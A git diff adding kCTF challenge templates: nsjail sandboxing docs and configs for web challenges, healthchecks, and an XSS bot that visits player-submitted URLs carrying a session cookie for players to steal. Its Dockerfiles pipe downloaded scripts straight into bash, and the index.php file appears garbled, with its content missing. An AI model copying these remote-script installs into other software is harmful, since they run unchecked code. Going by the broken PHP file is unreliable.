+Sandboxing is only necessary for challenges that give players RCE-style access. If a challenge does not provide such access, it is reasonable to just run a normal HTTP server listening on port 1337, without any additional sandboxing.
+
+For challenges that do give users RCE-level access, every player needs to be sandboxed. To make that possible, kCTF provides two ways to sandbox a web server:
+ 1. **CGI sandbox**: You can configure PHP (or any other CGI) to be sandboxed.
+ 2. **Proxy sandbox**: You can configure an HTTP server that sandboxes every HTTP request.
+
+A proxy sandbox is a bit expensive: it starts a new HTTP server for every TCP connection, so it is comparatively slow. A CGI sandbox is cheaper: it just calls the normal CGI endpoint, but wrapped in nsjail.
+
+The template challenge has an example of both (Node.js running behind a proxy, and PHP running as CGI). It is recommended to serve static resources with Apache alone, so as to save CPU and RAM. This can be accomplished by configuring Apache to forward certain sub-paths to the sandboxed web server while serving all other paths directly.
+
+## Directory layout
+
+The following files/directories are available:
+
+### /challenge.yaml
+
+`challenge.yaml` is the main configuration file. You can use it to change
+settings like the name and namespace of the challenge, the exposed ports, the
+proof-of-work difficulty etc.
+For documentation on the available fields, you can run `kubectl explain challenge` and
+`kubectl explain challenge.spec`.
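+
+For example, here is a sketch of the kind of settings you might tweak (the
+values are illustrative, not recommendations):
+
+```yaml
+apiVersion: kctf.dev/v1
+kind: Challenge
+metadata:
+  name: my-web-chal        # hypothetical challenge name
+spec:
+  deployed: true
+  powDifficultySeconds: 60 # enable the proof-of-work
+  network:
+    public: true           # expose the challenge publicly
+  ports:
+    - protocol: "HTTPS"
+      targetPort: 1337
+```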
+
+If you would like to have a shared directory (for sessions or uploads), you can mount it using:
+
+```yaml
+spec:
+  persistentVolumeClaims:
+    - $PUT_THE_NAME_OF_THE_CHALLENGE_HERE
+  podTemplate:
+    template:
+      spec:
+        containers:
+          - name: challenge
+            volumeMounts:
+              - name: gcsfuse
+                subPath: sessions # this is a folder inside the volume
+                mountPath: /mnt/disks/sessions
+              - name: gcsfuse
+                subPath: uploads
+                mountPath: /mnt/disks/uploads
+        volumes:
+          - name: gcsfuse
+            persistentVolumeClaim:
+              claimName: $PUT_THE_NAME_OF_THE_CHALLENGE_HERE
+```
+
+This will mount the same shared directories into all instances of the challenge. You can test this setup on a remote cluster using the PHP/CGI sandbox.
+
+### /challenge
+
+The `challenge` directory contains a Dockerfile that describes the challenge and
+any challenge files. You can use the Dockerfile to build your challenge as well
+if required.
+
+### /healthcheck
+
+The `healthcheck` directory is optional. If you don't want to write a healthcheck, feel free to delete it. However, we strongly recommend that you implement a healthcheck :).
+
+We provide a basic healthcheck skeleton that uses pwntools to implement the
+healthcheck code. The only requirement is that the healthcheck replies to GET
+requests to http://$host:45281/healthz with either a success or an error status
+code.
+
+In most cases, you will only have to modify `healthcheck/healthcheck.py`.
+
+## API contract
+
+Make sure your setup fulfills the following requirements so that it works with kCTF:
+
+* Verify `kctf_setup` is used as the first command in the CMD instruction of your `challenge/Dockerfile`.
+* You can do pretty much whatever you want in the `challenge` directory but:
+* We strongly recommend using nsjail in all challenges. While nsjail is already installed, you need to configure it in `challenge/nsjail.cfg`. For more information on nsjail, see the [official website](https://nsjail.dev/).
+* Your challenge receives connections on port 1337. The port can be changed in `challenge.yaml`.
+* The healthcheck directory is optional.
+  * If it exists, the image should run a webserver on port 45281 and respond to `/healthz` requests.
diff --git a/v8ctf/kctf/challenge-templates/web/challenge.yaml b/v8ctf/kctf/challenge-templates/web/challenge.yaml
new file mode 100644
index 00000000..ed731a9c
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/challenge.yaml
@@ -0,0 +1,15 @@
+apiVersion: kctf.dev/v1
+kind: Challenge
+metadata:
+  name: apache-others
+spec:
+  deployed: true
+  powDifficultySeconds: 0
+  network:
+    public: false
+  ports:
+    - protocol: "HTTPS"
+      targetPort: 1337
+  healthcheck:
+    # TIP: disable the healthcheck during development
+    enabled: true
diff --git a/v8ctf/kctf/challenge-templates/web/challenge/Dockerfile b/v8ctf/kctf/challenge-templates/web/challenge/Dockerfile
new file mode 100644
index 00000000..309b1818
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/challenge/Dockerfile
@@ -0,0 +1,75 @@
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
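+
+# Structure of this Dockerfile, mirroring the pwn template: the "chroot" stage
+# prepares the jailed filesystem (PHP CGI plus the Node.js web apps), and the
+# kctf challenge base image then fronts everything with Apache on port 1337,
+# proxying /nodejs to an nsjailed Node.js server on port 8081 and running PHP
+# through nsjailed CGI (see the CMD and the apache2 config below).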
+FROM ubuntu:20.04 as chroot
+
+RUN /usr/sbin/useradd -u 1000 user
+
+RUN apt-get update \
+    && apt-get install -yq --no-install-recommends \
+       curl ca-certificates socat gnupg lsb-release software-properties-common php-cgi \
+    && rm -rf /var/lib/apt/lists/*
+
+RUN curl -sSL https://deb.nodesource.com/gpgkey/nodesource.gpg.key | apt-key add - \
+    && (echo "deb https://deb.nodesource.com/node_10.x $(lsb_release -s -c) main";\
+        echo "deb-src https://deb.nodesource.com/node_10.x $(lsb_release -s -c) main") \
+        > /etc/apt/sources.list.d/nodesource.list \
+    && add-apt-repository universe \
+    && apt-get update \
+    && apt-get install -yq --no-install-recommends nodejs socat \
+    && rm -rf /var/lib/apt/lists/*
+
+RUN mkdir -p /mnt/disks/sessions
+RUN mkdir -p /mnt/disks/uploads
+
+VOLUME /mnt/disks/sessions
+VOLUME /mnt/disks/uploads
+
+COPY web-apps /web-apps
+COPY web-servers /web-servers
+
+COPY flag /
+
+FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f
+
+RUN apt-get update \
+    && DEBIAN_FRONTEND=noninteractive apt-get install -yq --no-install-recommends tzdata apache2 \
+    && ln -fs /usr/share/zoneinfo/Europe/Berlin /etc/localtime \
+    && dpkg-reconfigure --frontend noninteractive tzdata \
+    && rm -rf /var/lib/apt/lists/*
+
+RUN service apache2 start
+
+COPY --from=chroot / /chroot
+
+# For Proxy
+RUN ln -s /etc/apache2/mods-available/proxy.load /etc/apache2/mods-enabled/
+RUN ln -s /etc/apache2/mods-available/proxy_http.load /etc/apache2/mods-enabled/
+
+# For CGI sandboxing
+RUN ln -s /etc/apache2/mods-available/cgi.load /etc/apache2/mods-enabled/cgi.load
+RUN ln -s /etc/apache2/mods-available/actions.load /etc/apache2/mods-enabled/actions.load
+RUN ln -s /chroot/web-apps /web-apps
+COPY cgi-bin /usr/lib/cgi-bin
+
+COPY apache2-kctf-nsjail.conf /etc/apache2/conf-enabled/
+
+COPY web-servers.nsjail.cfg /home/user/web-servers.nsjail.cfg
+COPY cgi-bin.nsjail.cfg /home/user/cgi-bin.nsjail.cfg
+
+VOLUME /var/log/apache2
+VOLUME /var/run/apache2
+
+CMD kctf_setup \
+    && (kctf_drop_privs nsjail --config /home/user/web-servers.nsjail.cfg --port 8081 -- /web-servers/nodejs.sh &) \
+    && bash -c 'source /etc/apache2/envvars && APACHE_RUN_USER=user APACHE_RUN_GROUP=user /usr/sbin/apache2 -D FOREGROUND'
diff --git a/v8ctf/kctf/challenge-templates/web/challenge/apache2-kctf-nsjail.conf b/v8ctf/kctf/challenge-templates/web/challenge/apache2-kctf-nsjail.conf
new file mode 100644
index 00000000..da12b9c8
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/challenge/apache2-kctf-nsjail.conf
@@ -0,0 +1,20 @@
+ServerName kctf-nsjail
+Listen 1337
+User user
+
+# This is only necessary for CGI sandboxing
+<Directory "/web-apps">
+  Options +ExecCGI
+  Options +FollowSymLinks
+  Action application/x-nsjail-httpd-php /cgi-bin/nsjail-php-cgi
+  AddHandler application/x-nsjail-httpd-php php
+  Require all granted
+</Directory>
+
+<VirtualHost *:1337>
+  # For proxy sandboxing use the two lines below
+  ProxyPreserveHost On
+  ProxyPass "/nodejs" "http://localhost:8081/"
+  # For CGI sandboxing use the line below
+  DocumentRoot "/web-apps/php"
+</VirtualHost>
diff --git a/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin.nsjail.cfg b/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin.nsjail.cfg
new file mode 100644
index 00000000..09c9a00a
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin.nsjail.cfg
@@ -0,0 +1,80 @@
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+# See options available at https://github.com/google/nsjail/blob/master/config.proto
+
+name: "apache2-proxy-nsjail"
+description: "Example nsjail configuration for containing a web server."
+
+mode: ONCE
+uidmap {inside_id: "1000"}
+gidmap {inside_id: "1000"}
+mount_proc: true
+keep_env: true
+rlimit_as_type: HARD
+rlimit_cpu_type: HARD
+rlimit_nofile_type: HARD
+rlimit_nproc_type: HARD
+
+mount: [
+    {
+        src: "/chroot"
+        dst: "/"
+        is_bind: true
+    },
+    {
+        src: "/dev"
+        dst: "/dev"
+        is_bind: true
+    },
+    {
+        src: "/dev/null"
+        dst: "/dev/null"
+        is_bind: true
+    },
+    {
+        src: "/etc/resolv.conf"
+        dst: "/etc/resolv.conf"
+        is_bind: true
+    },
+    {
+        dst: "/mnt/disks/sessions"
+        fstype: "tmpfs"
+        rw: true
+    },
+    {
+        src: "/mnt/disks/sessions"
+        dst: "/mnt/disks/sessions"
+        is_bind: true
+        rw: true
+        mandatory: false
+    },
+    {
+        dst: "/mnt/disks/uploads"
+        fstype: "tmpfs"
+        rw: true
+    },
+    {
+        src: "/mnt/disks/uploads"
+        dst: "/mnt/disks/uploads"
+        is_bind: true
+        rw: true
+        mandatory: false
+    },
+    {
+        dst: "/tmp"
+        fstype: "tmpfs"
+        rw: true
+    }
+]
diff --git a/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin/nsjail-php-cgi b/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin/nsjail-php-cgi
new file mode 100755
index 00000000..b4dc881c
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/challenge/cgi-bin/nsjail-php-cgi
@@ -0,0 +1,3 @@
+#!/bin/bash
+
+/usr/bin/nsjail --config /home/user/cgi-bin.nsjail.cfg -- /usr/lib/cgi-bin/php "$@"
diff --git a/v8ctf/kctf/challenge-templates/web/challenge/flag b/v8ctf/kctf/challenge-templates/web/challenge/flag
new file mode 100644
index 00000000..9ecc2ebf
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/challenge/flag
@@ -0,0 +1 @@
+CTF{TestFlag}
\ No newline at end of file
diff --git a/v8ctf/kctf/challenge-templates/web/challenge/web-apps/nodejs/app.js b/v8ctf/kctf/challenge-templates/web/challenge/web-apps/nodejs/app.js
new file mode 100644
index 00000000..bb0d78fd
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/challenge/web-apps/nodejs/app.js
@@ -0,0 +1,16 @@
+const http = require('http');
+
+const hostname = '127.0.0.1';
+const port = 8080;
+
+const server = http.createServer((req, res) => {
+  res.statusCode = 200;
+  res.setHeader('Content-Type', 'text/plain');
+  // Reply with the request URL reversed; the healthcheck fetches
+  // "/nodejs?edonami" (proxied here as "/?edonami") and looks for "imanode".
+  res.end(req.url.split('').reverse().join(''));
+});
+
+server.listen(port, hostname, () => {
+  console.log(`Server running at http://${hostname}:${port}/`);
+});
diff --git a/v8ctf/kctf/challenge-templates/web/challenge/web-apps/php/index.php b/v8ctf/kctf/challenge-templates/web/challenge/web-apps/php/index.php
new file mode 100755
index 00000000..aab4a4eb
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/challenge/web-apps/php/index.php
@@ -0,0 +1,27 @@
+
+
+
+
+
+ + + +
+
+ diff --git a/v8ctf/kctf/challenge-templates/web/challenge/web-servers.nsjail.cfg b/v8ctf/kctf/challenge-templates/web/challenge/web-servers.nsjail.cfg new file mode 100644 index 00000000..f304aec6 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/web-servers.nsjail.cfg @@ -0,0 +1,56 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +# See options available at https://github.com/google/nsjail/blob/master/config.proto + +name: "apache2-proxy-nsjail" +description: "Example nsjail configuration for containing a web server." + +mode: LISTEN +uidmap {inside_id: "1000"} +gidmap {inside_id: "1000"} +mount_proc: true +rlimit_as_type: HARD +rlimit_cpu_type: HARD +rlimit_nofile_type: HARD +rlimit_nproc_type: HARD + +mount: [ + { + src: "/chroot" + dst: "/" + is_bind: true + }, + { + src: "/dev" + dst: "/dev" + is_bind: true + }, + { + src: "/dev/null" + dst: "/dev/null" + is_bind: true + rw: true + }, + { + src: "/etc/resolv.conf" + dst: "/etc/resolv.conf" + is_bind: true + }, + { + dst: "/tmp" + fstype: "tmpfs" + rw: true + } +] diff --git a/v8ctf/kctf/challenge-templates/web/challenge/web-servers/nodejs.sh b/v8ctf/kctf/challenge-templates/web/challenge/web-servers/nodejs.sh new file mode 100755 index 00000000..7752f2bf --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/challenge/web-servers/nodejs.sh @@ -0,0 +1,7 @@ +#!/bin/bash + +# Start node web server +(&>/dev/null node /web-apps/nodejs/app.js)& + +# Proxy stdin/stdout to web server +socat - TCP:127.0.0.1:8080,forever diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/Dockerfile b/v8ctf/kctf/challenge-templates/web/healthcheck/Dockerfile new file mode 100644 index 00000000..2df56306 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/healthcheck/Dockerfile @@ -0,0 +1,18 @@ +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. 
+FROM gcr.io/kctf-docker/healthcheck@sha256:6709709a8cfd6e2d743c86d58398c00ca4eb26befd3b1a0a629ab35f91e98ef0
+
+COPY healthcheck_loop.sh healthcheck.py healthz_webserver.py /home/user/
+
+CMD kctf_drop_privs /home/user/healthcheck_loop.sh & /home/user/healthz_webserver.py
diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/README.md b/v8ctf/kctf/challenge-templates/web/healthcheck/README.md
new file mode 100644
index 00000000..8dbcd6a8
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/healthcheck/README.md
@@ -0,0 +1,14 @@
+# Healthcheck
+
+kCTF checks the health of challenges by accessing the healthcheck via
+http://host:45281/healthz, which needs to return either 200 OK or an error
+status depending on the health of the challenge.
+
+The default healthcheck consists of:
+* a loop that repeatedly calls a python script and writes the status to a file
+* a webserver that checks the file and serves /healthz
+* the actual healthcheck code, using pwntools for convenience
+
+To modify it, you will likely only have to change the script in healthcheck.py.
+You can test whether the challenge replies as expected or, better, add a full
+example solution that tries to get the flag from the challenge.
diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck.py b/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck.py
new file mode 100755
index 00000000..edcb09b5
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck.py
@@ -0,0 +1,24 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+import pwnlib.util.web
+
+# The example nodejs app echoes the request URL reversed, so fetching
+# "/nodejs?edonami" must give a response that contains "imanode".
+if b"imanode" in pwnlib.util.web.wget("http://localhost:1337/nodejs?edonami"):
+  exit(0)
+
+exit(1)
diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck_loop.sh b/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck_loop.sh
new file mode 100755
index 00000000..acf69158
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/web/healthcheck/healthcheck_loop.sh
@@ -0,0 +1,32 @@
+#!/bin/bash
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+set -Eeuo pipefail
+
+TIMEOUT=20
+PERIOD=30
+
+export TERM=linux
+export TERMINFO=/etc/terminfo
+
+while true; do
+  echo -n "[$(date)] "
+  if timeout "${TIMEOUT}" /home/user/healthcheck.py; then
+    echo 'ok' | tee /tmp/healthz
+  else
+    echo -n "$? "
" + echo 'err' | tee /tmp/healthz + fi + sleep "${PERIOD}" +done diff --git a/v8ctf/kctf/challenge-templates/web/healthcheck/healthz_webserver.py b/v8ctf/kctf/challenge-templates/web/healthcheck/healthz_webserver.py new file mode 100755 index 00000000..62cf0198 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/web/healthcheck/healthz_webserver.py @@ -0,0 +1,39 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# Copyright 2020 Google LLC +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +import http.server + +class HealthzHandler(http.server.BaseHTTPRequestHandler): + def do_GET(self): + if self.path != '/healthz': + self.send_response(404) + self.send_header("Content-length", "0") + self.end_headers() + return + + content = b'err' + try: + with open('/tmp/healthz', 'rb') as fd: + content = fd.read().strip() + except: + pass + self.send_response(200 if content == b'ok' else 400) + self.send_header("Content-type", "text/plain") + self.send_header("Content-length", str(len(content))) + self.end_headers() + self.wfile.write(content) + +httpd = http.server.HTTPServer(('', 45281), HealthzHandler) +httpd.serve_forever() diff --git a/v8ctf/kctf/challenge-templates/xss-bot/README.md b/v8ctf/kctf/challenge-templates/xss-bot/README.md new file mode 100644 index 00000000..9509de44 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/README.md @@ -0,0 +1,5 @@ += Example XSS Bot = + +This bot will read a url from the user and then connect to it using chrome (puppeteer). +For the simplest setup, it should be enough to modify the `challenge/cookie` +file and deploy. diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge.yaml b/v8ctf/kctf/challenge-templates/xss-bot/challenge.yaml new file mode 100644 index 00000000..c507b09a --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge.yaml @@ -0,0 +1,19 @@ +apiVersion: kctf.dev/v1 +kind: Challenge +metadata: + name: xss-bot +spec: + deployed: true + powDifficultySeconds: 0 + network: + public: false + healthcheck: + # TIP: disable the healthcheck during development + enabled: true + # You can allow the bot to connect to other challenges internally. + # This can be useful during testing so that you don't have to make your + # challenge public. + # The challenge will be reachable at $name.default.svc.cluster.local or + # simply at $name with the default k8s search list. + #allowConnectTo: + # - otherchallenge diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge/.puppeteerrc.cjs b/v8ctf/kctf/challenge-templates/xss-bot/challenge/.puppeteerrc.cjs new file mode 100644 index 00000000..83615455 --- /dev/null +++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge/.puppeteerrc.cjs @@ -0,0 +1,11 @@ + +const {join} = require('path'); + + +/** + * @type {import("puppeteer").Configuration} + */ +module.exports = { + // Changes the cache location for Puppeteer. 
+  cacheDirectory: join(__dirname, ".cache", "puppeteer"),
+};
diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge/Dockerfile b/v8ctf/kctf/challenge-templates/xss-bot/challenge/Dockerfile
new file mode 100644
index 00000000..46acfa1e
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge/Dockerfile
@@ -0,0 +1,108 @@
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+FROM gcr.io/kctf-docker/challenge@sha256:0f7d757bcda470c3bbc063606335b915e03795d72ba1d8fdb6f0f9ff3757364f
+
+RUN apt-get update && apt-get install -y gnupg2 wget
+
+# Install the latest Chrome dev package and fonts to support major charsets (Chinese, Japanese, Arabic, Hebrew, Thai and a few others).
+# Note: this installs the necessary libs to make the version of Chromium that Puppeteer bundles work.
+# Deps from https://github.com/puppeteer/puppeteer/blob/main/docs/troubleshooting.md#chrome-headless-doesnt-launch-on-unix
+# plus libxshmfence1 which seems to be missing.
+RUN wget -q -O - https://dl-ssl.google.com/linux/linux_signing_key.pub | apt-key add - \
+    && sh -c 'echo "deb [arch=amd64] http://dl.google.com/linux/chrome/deb/ stable main" >> /etc/apt/sources.list.d/google.list' \
+    && wget -q -O - https://deb.nodesource.com/setup_16.x | bash - \
+    && apt-get update \
+    && DEBIAN_FRONTEND=noninteractive apt-get install -yq --no-install-recommends \
+       ca-certificates \
+       fonts-liberation \
+       libappindicator3-1 \
+       libasound2 \
+       libatk-bridge2.0-0 \
+       libatk1.0-0 \
+       libc6 \
+       libcairo2 \
+       libcups2 \
+       libdbus-1-3 \
+       libexpat1 \
+       libfontconfig1 \
+       libgbm1 \
+       libgcc1 \
+       libglib2.0-0 \
+       libgtk-3-0 \
+       libnspr4 \
+       libnss3 \
+       libpango-1.0-0 \
+       libpangocairo-1.0-0 \
+       libstdc++6 \
+       libx11-6 \
+       libx11-xcb1 \
+       libxcb1 \
+       libxcomposite1 \
+       libxcursor1 \
+       libxdamage1 \
+       libxext6 \
+       libxfixes3 \
+       libxi6 \
+       libxrandr2 \
+       libxrender1 \
+       libxshmfence1 \
+       libxss1 \
+       libxtst6 \
+       lsb-release \
+       wget \
+       xdg-utils \
+       nodejs \
+    && rm -rf /var/lib/apt/lists/*
+
+COPY bot.js /home/user/
+COPY cookie /home/user/
+COPY .puppeteerrc.cjs /home/user/
+RUN cd /home/user && npm install puppeteer
+
+ENV DOMAIN="www.example.com"
+# Hosting multiple web challenges same-site to each other can lead to
+# unintended solutions. E.g. an XSS on a.foo.com will be able to overwrite
+# cookies on b.foo.com.
+# To prevent this, we can block Chrome from accessing any subdomains under
+# foo.com except for the real challenge domain using a PAC script.
+# Unfortunately, PAC will not work in Chrome's headless mode, so this will use
+# more resources.
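+# As a rough sketch, the PAC script generated in bot.js decides per request:
+#   host == $DOMAIN                        -> DIRECT (allowed)
+#   any other host under $REGISTERED_DOMAIN -> PROXY 127.0.0.1:1 (black-holed)
+#   everything else                        -> DIRECT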
+ENV BLOCK_SUBORIGINS="1"
+ENV REGISTERED_DOMAIN="example.com"
+
+RUN if [ "${BLOCK_SUBORIGINS}" = "1" ]; then \
+      apt-get update \
+      && apt-get install -yq --no-install-recommends xvfb \
+      && rm -rf /var/lib/apt/lists/*; \
+    fi
+RUN sed -i -e "s/DOMAIN_SET_IN_DOCKERFILE/${DOMAIN}/" /home/user/cookie
+
+CMD kctf_setup && \
+    mount -t tmpfs none /tmp && \
+    mkdir /tmp/chrome-userdata && chmod o+rwx /tmp/chrome-userdata && \
+    while true; do \
+      if [ "${BLOCK_SUBORIGINS}" = "1" ]; then \
+        kctf_drop_privs env BLOCK_SUBORIGINS="${BLOCK_SUBORIGINS}" DOMAIN="${DOMAIN}" REGISTERED_DOMAIN="${REGISTERED_DOMAIN}" xvfb-run /usr/bin/node /home/user/bot.js; \
+      else \
+        kctf_drop_privs env BLOCK_SUBORIGINS="${BLOCK_SUBORIGINS}" DOMAIN="${DOMAIN}" REGISTERED_DOMAIN="${REGISTERED_DOMAIN}" /usr/bin/node /home/user/bot.js; \
+      fi; \
+    done & \
+    kctf_drop_privs \
+      socat \
+        TCP-LISTEN:1337,reuseaddr,fork \
+        EXEC:"kctf_pow socat STDIN TCP\:localhost\:1338"
diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge/bot.js b/v8ctf/kctf/challenge-templates/xss-bot/challenge/bot.js
new file mode 100755
index 00000000..88dc51f3
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge/bot.js
@@ -0,0 +1,92 @@
+const puppeteer = require('puppeteer');
+const fs = require('fs');
+const net = require('net');
+
+const DOMAIN = process.env.DOMAIN;
+if (DOMAIN == undefined) throw 'domain undefined';
+const REGISTERED_DOMAIN = process.env.REGISTERED_DOMAIN;
+const BLOCK_SUBORIGINS = process.env.BLOCK_SUBORIGINS == "1";
+const BOT_TIMEOUT = process.env.BOT_TIMEOUT || 60*1000;
+
+// will only be used if BLOCK_SUBORIGINS is enabled
+const PAC_B64 = Buffer.from(`
+function FindProxyForURL (url, host) {
+  if (host == "${DOMAIN}") {
+    return 'DIRECT';
+  }
+  if (host == "${REGISTERED_DOMAIN}" || dnsDomainIs(host, ".${REGISTERED_DOMAIN}")) {
+    // nothing listens on 127.0.0.1:1, so these requests are black-holed
+    return 'PROXY 127.0.0.1:1';
+  }
+  return 'DIRECT';
+}
+`).toString('base64');
+const puppeteer_args = {};
+if (BLOCK_SUBORIGINS) {
+  puppeteer_args.headless = false;
+  puppeteer_args.args = [
+    '--user-data-dir=/tmp/chrome-userdata',
+    '--breakpad-dump-location=/tmp/chrome-crashes',
+    '--proxy-pac-url=data:application/x-ns-proxy-autoconfig;base64,'+PAC_B64,
+  ];
+}
+
+(async function(){
+  const browser = await puppeteer.launch(puppeteer_args);
+
+  function ask_for_url(socket) {
+    socket.state = 'URL';
+    socket.write('Please send me a URL to open.\n');
+  }
+
+  async function load_url(socket, data) {
+    let url = data.toString().trim();
+    console.log(`checking url: ${url}`);
+    if (!url.startsWith('http://') && !url.startsWith('https://')) {
+      socket.state = 'ERROR';
+      socket.write('Invalid scheme (http/https only).\n');
+      socket.destroy();
+      return;
+    }
+    socket.state = 'LOADED';
+    let cookie = JSON.parse(fs.readFileSync('/home/user/cookie'));
+
+    const context = await browser.createIncognitoBrowserContext();
+    const page = await context.newPage();
+    await page.setCookie(cookie);
+    socket.write(`Loading page ${url}.\n`);
+    setTimeout(()=>{
+      try {
+        context.close();
+        socket.write('timeout\n');
+        socket.destroy();
+      } catch (err) {
+        console.log(`err: ${err}`);
+      }
+    }, BOT_TIMEOUT);
+    await page.goto(url);
+  }
+
+  var server = net.createServer();
+  server.listen(1338);
+  console.log('listening on port 1338');
+
+  server.on('connection', socket=>{
+    socket.on('data', data=>{
+      try {
+        if (socket.state == 'URL') {
+          load_url(socket, data);
+        }
+      } catch (err) {
+        console.log(`err: ${err}`);
+      }
+    });
+
+    try {
+      ask_for_url(socket);
+    } catch (err) {
+      console.log(`err: ${err}`);
+    }
+  });
+})();
+
diff --git a/v8ctf/kctf/challenge-templates/xss-bot/challenge/cookie b/v8ctf/kctf/challenge-templates/xss-bot/challenge/cookie
new file mode 100644
index 00000000..24871dc7
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/xss-bot/challenge/cookie
@@ -0,0 +1,9 @@
+{
+  "name": "session",
+  "value": "aiy3Uushcha4Zuzu",
+  "domain": "DOMAIN_SET_IN_DOCKERFILE",
+  "url": "https://DOMAIN_SET_IN_DOCKERFILE/",
+  "path": "/",
+  "httpOnly": true,
+  "secure": true
+}
diff --git a/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/Dockerfile b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/Dockerfile
new file mode 100644
index 00000000..2df56306
--- /dev/null
+++ b/v8ctf/kctf/challenge-templates/xss-bot/healthcheck/Dockerfile
@@ -0,0 +1,18 @@
+# Copyright 2020 Google LLC
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      https://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
